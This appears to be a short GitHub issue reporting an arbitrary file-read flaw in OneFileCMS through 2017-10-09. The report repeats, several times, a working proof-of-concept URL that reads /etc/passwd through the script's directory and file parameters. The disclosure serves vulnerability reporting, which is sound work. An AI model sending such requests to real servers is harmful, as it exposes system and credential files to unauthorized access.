Open havysec opened 6 years ago
onefilecms.php in OneFileCMS through 2017-10-09 might allow attackers to access some secret file like passwd
access http://fragrant:30001/OneFileCMS/onefilecms.php?i=etc/&f=passwd&p=raw_view
http://fragrant:30001/OneFileCMS/onefilecms.php?i=etc/&f=passwd&p=raw_view
onefilecms.php in OneFileCMS through 2017-10-09 might allow attackers to access some secret file like passwd
access
http://fragrant:30001/OneFileCMS/onefilecms.php?i=etc/&f=passwd&p=raw_view